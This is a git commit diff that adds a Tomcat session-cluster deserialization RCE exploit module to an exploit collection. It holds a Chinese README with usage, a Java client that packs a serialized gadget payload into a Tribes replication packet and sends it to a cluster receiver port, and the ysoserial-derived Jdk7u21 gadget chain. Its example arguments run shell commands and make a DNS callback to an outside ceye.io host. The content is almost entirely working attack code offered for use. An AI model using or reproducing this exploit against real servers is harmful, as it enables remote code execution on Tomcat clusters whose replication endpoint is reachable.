feat:添加tomcat session集群同步功能RCE exp

Author: “threedr3am”

tomcat/pom.xml

@@ -13,6 +13,7 @@
   <packaging>pom</packaging>
   <modules>
     <module>ajp-bug</module>
+    <module>sync-session-bug</module>
   </modules>
 
   <dependencies>

tomcat/sync-session-bug/README.md

@@ -0,0 +1,76 @@
+### sync-session-bug
+
+这是一个tomcat使用了自带session同步功能时，不安全的配置（没有使用EncryptInterceptor）导致存在的反序列化漏洞，通过精心构造的数据包，
+可以对使用了tomcat自带session同步功能的服务器进行攻击。
+
+### 条件：
+1. tomcat启用了session同步，没有配置EncryptInterceptor
+2. jdk版本低于jdk8u20、jdk7u21（不知道有没有错）
+3. 同步端点可访问（一般是内网）
+
+### tomcat-session同步配置
+（conf/server.xml）：
+```
+<Server>
+    ...
+    
+    <Service>
+        ...
+        
+        <Engine>
+            ...
+            
+            <Cluster className="org.apache.catalina.ha.tcp.SimpleTcpCluster"
+                    channelSendOptions="6">
+            
+                    <Manager className="org.apache.catalina.ha.session.BackupManager"
+                      expireSessionsOnShutdown="false"
+                      notifyListenersOnReplication="true"
+                      mapSendOptions="6"/>
+            
+            
+                    <Channel className="org.apache.catalina.tribes.group.GroupChannel">
+                      <Membership className="org.apache.catalina.tribes.membership.McastService"
+                        address="228.0.0.4"
+                        port="45564"
+                        frequency="500"
+                        dropTime="3000"/>
+                      <Receiver className="org.apache.catalina.tribes.transport.nio.NioReceiver"
+                        address="123.123.123.123"
+                        port="5000"
+                        selectorTimeout="100"
+                        maxThreads="6"/>
+            
+                      <Sender className="org.apache.catalina.tribes.transport.ReplicationTransmitter">
+                        <Transport className="org.apache.catalina.tribes.transport.nio.PooledParallelSender"/>
+                      </Sender>
+                    </Channel>
+            
+                    <Valve className="org.apache.catalina.ha.tcp.ReplicationValve"
+                      filter=".*\.gif;.*\.js;.*\.jpg;.*\.png;.*\.htm;.*\.html;.*\.css;.*\.txt;"/>
+            
+                    <Deployer className="org.apache.catalina.ha.deploy.FarmWarDeployer"
+                      tempDir="/tmp/war-temp/"
+                      deployDir="/tmp/war-deploy/"
+                      watchDir="/tmp/war-listen/"
+                      watchEnabled="false"/>
+            
+                    <ClusterListener className="org.apache.catalina.ha.session.ClusterSessionListener"/>
+            </Cluster>
+        </Engine>
+  </Service>
+</Server>
+```
+
+### 使用
+
+运行TomcatSessionClusterExploit.main
+
+参数，例：
+
+```
+//        args = new String[] {"127.0.0.1", "5000", "Jdk7u21" ,"/bin/bash", "-c", "touch /tmp/11111"};
+//        args = new String[] {"127.0.0.1", "5000", "Jdk8u20" ,"/bin/bash", "-c", "touch /tmp/11111"};
+//        args = new String[] {"127.0.0.1", "5000", "Jdk8u20" ,"/bin/bash", "-c", "/System/Applications/Calculator.app/Contents/MacOS/Calculator"};
+//        args = new String[] {"127.0.0.1", "5000", "URLDNS", "http://tomcat.yqzf33.ceye.io"};
+```

tomcat/sync-session-bug/pom.xml

@@ -0,0 +1,23 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project xmlns="http://maven.apache.org/POM/4.0.0"
+  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+  xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
+  <parent>
+    <artifactId>tomcat</artifactId>
+    <groupId>com.xyh</groupId>
+    <version>1.0-SNAPSHOT</version>
+  </parent>
+  <modelVersion>4.0.0</modelVersion>
+
+  <artifactId>sync-session-bug</artifactId>
+
+  <dependencies>
+    <dependency>
+      <groupId>javassist</groupId>
+      <artifactId>javassist</artifactId>
+      <version>3.12.0.GA</version>
+      <scope>compile</scope>
+    </dependency>
+  </dependencies>
+
+</project>

tomcat/sync-session-bug/src/main/java/com/threedr3am/bug/tomcat/sync/session/TomcatSessionClusterExploit.java

@@ -0,0 +1,87 @@
+package com.threedr3am.bug.tomcat.sync.session;
+
+
+import com.threedr3am.bug.tomcat.sync.session.payload.Payload;
+import com.threedr3am.bug.tomcat.sync.session.payload.Payloads;
+import com.threedr3am.bug.tomcat.sync.session.support.ChannelData;
+import com.threedr3am.bug.tomcat.sync.session.support.MemberImpl;
+import com.threedr3am.bug.tomcat.sync.session.support.XByteBuffer;
+import com.threedr3am.bug.tomcat.sync.session.utils.Serializer;
+import java.net.Socket;
+import java.util.Arrays;
+
+
+/**
+ * todo 当tomcat使用了cluster功能共享session时，若同步端点可被访问，即可发生恶意序列化数据进行RCE
+ *
+ * conf/server.xml
+ *
+ *      <Cluster className="org.apache.catalina.ha.tcp.SimpleTcpCluster"
+ *         channelSendOptions="6">
+ *
+ *         <Manager className="org.apache.catalina.ha.session.BackupManager"
+ *           expireSessionsOnShutdown="false"
+ *           notifyListenersOnReplication="true"
+ *           mapSendOptions="6"/>
+ *
+ *
+ *         <Channel className="org.apache.catalina.tribes.group.GroupChannel">
+ *           <Membership className="org.apache.catalina.tribes.membership.McastService"
+ *             address="228.0.0.4"
+ *             port="45564"
+ *             frequency="500"
+ *             dropTime="3000"/>
+ *           <Receiver className="org.apache.catalina.tribes.transport.nio.NioReceiver"
+ *             address="auto"
+ *             port="5000"
+ *             selectorTimeout="100"
+ *             maxThreads="6"/>
+ *
+ *           <Sender className="org.apache.catalina.tribes.transport.ReplicationTransmitter">
+ *             <Transport className="org.apache.catalina.tribes.transport.nio.PooledParallelSender"/>
+ *           </Sender>
+ *         </Channel>
+ *
+ *         <Valve className="org.apache.catalina.ha.tcp.ReplicationValve"
+ *           filter=".*\.gif;.*\.js;.*\.jpg;.*\.png;.*\.htm;.*\.html;.*\.css;.*\.txt;"/>
+ *
+ *         <Deployer className="org.apache.catalina.ha.deploy.FarmWarDeployer"
+ *           tempDir="/tmp/war-temp/"
+ *           deployDir="/tmp/war-deploy/"
+ *           watchDir="/tmp/war-listen/"
+ *           watchEnabled="false"/>
+ *
+ *         <ClusterListener className="org.apache.catalina.ha.session.ClusterSessionListener"/>
+ *       </Cluster>
+ *
+ * @author threedr3am
+ *
+ */
+public class TomcatSessionClusterExploit {
+
+    public static final void main ( String[] args ) throws Exception {
+//        args = new String[] {"127.0.0.1", "20000", "Jdk7u21" ,"/bin/bash", "-c", "touch /tmp/11111"};
+//        args = new String[] {"127.0.0.1", "20000", "Jdk8u20" ,"/bin/bash", "-c", "touch /tmp/11111"};
+//        args = new String[] {"127.0.0.1", "20000", "Jdk8u20" ,"/bin/bash", "-c", "/System/Applications/Calculator.app/Contents/MacOS/Calculator"};
+//        args = new String[] {"127.0.0.1", "20000", "URLDNS", "http://tomcat.xxxxx.ceye.io"};
+        if ( args.length < 4 ) {
+            System.err.println(TomcatSessionClusterExploit.class.getName() + " <tomcat_ip> <tomcat_receive_port> <payload_type> <payload_arg>");
+            System.exit(-1);
+        }
+        Class<? extends Payload> c = Payloads.valueOf(args[2]).getClazz();
+        final Object payloadObject = c.newInstance().getObject(Arrays.copyOfRange(args, 3, args.length));
+        byte[] ser = payloadObject instanceof byte[] ? (byte[]) payloadObject : Serializer.serialize(payloadObject);
+
+        ChannelData data = new ChannelData(true);//generates a unique Id
+        data.setAddress(new MemberImpl("127.0.0.1", 11111, 1000));
+        data.setTimestamp(System.currentTimeMillis());
+        XByteBuffer xByteBuffer = new XByteBuffer(ser.length, false);
+        xByteBuffer.append(ser, 0, ser.length);
+        data.setMessage(xByteBuffer);
+        ser = XByteBuffer.createDataPackage(data);
+
+        Socket socket = new Socket(args[0], Integer.parseInt(args[1]));
+        socket.getOutputStream().write(ser);
+        socket.getOutputStream().close();
+    }
+}

tomcat/sync-session-bug/src/main/java/com/threedr3am/bug/tomcat/sync/session/payload/Jdk7u21.java

@@ -0,0 +1,79 @@
+package com.threedr3am.bug.tomcat.sync.session.payload;
+
+import com.threedr3am.bug.tomcat.sync.session.utils.Gadgets;
+import com.threedr3am.bug.tomcat.sync.session.utils.Reflections;
+import java.lang.reflect.InvocationHandler;
+import java.util.HashMap;
+import java.util.LinkedHashSet;
+import javax.xml.transform.Templates;
+
+/*
+
+Gadget chain that works against JRE 1.7u21 and earlier. Payload generation has
+the same JRE version requirements.
+
+See: https://gist.github.com/frohoff/24af7913611f8406eaf3
+
+Call tree:
+
+LinkedHashSet.readObject()
+  LinkedHashSet.add()
+    ...
+      TemplatesImpl.hashCode() (X)
+  LinkedHashSet.add()
+    ...
+      Proxy(Templates).hashCode() (X)
+        AnnotationInvocationHandler.invoke() (X)
+          AnnotationInvocationHandler.hashCodeImpl() (X)
+            String.hashCode() (0)
+            AnnotationInvocationHandler.memberValueHashCode() (X)
+              TemplatesImpl.hashCode() (X)
+      Proxy(Templates).equals()
+        AnnotationInvocationHandler.invoke()
+          AnnotationInvocationHandler.equalsImpl()
+            Method.invoke()
+              ...
+                TemplatesImpl.getOutputProperties()
+                  TemplatesImpl.newTransformer()
+                    TemplatesImpl.getTransletInstance()
+                      TemplatesImpl.defineTransletClasses()
+                        ClassLoader.defineClass()
+                        Class.newInstance()
+                          ...
+                            MaliciousClass.<clinit>()
+                              ...
+                                Runtime.exec()
+ */
+
+/**
+ * code from ysoserial
+ */
+@SuppressWarnings({ "rawtypes", "unchecked" })
+public class Jdk7u21 implements Payload {
+
+	public Object getObject(final String... command) throws Exception {
+		final Object templates = Gadgets.createTemplatesImpl(command);
+
+		String zeroHashCodeStr = "f5a5a608";
+
+		HashMap map = new HashMap();
+		map.put(zeroHashCodeStr, "foo");
+
+		InvocationHandler tempHandler = (InvocationHandler) Reflections.getFirstCtor(Gadgets.ANN_INV_HANDLER_CLASS).newInstance(
+        Override.class, map);
+		Reflections.setFieldValue(tempHandler, "type", Templates.class);
+		Templates proxy = Gadgets.createProxy(tempHandler, Templates.class);
+
+		LinkedHashSet set = new LinkedHashSet(); // maintain order
+		set.add(templates);
+		set.add(proxy);
+
+		Reflections.setFieldValue(templates, "_auxClasses", null);
+		Reflections.setFieldValue(templates, "_class", null);
+
+		map.put(zeroHashCodeStr, templates); // swap in real object
+
+		return set;
+	}
+
+}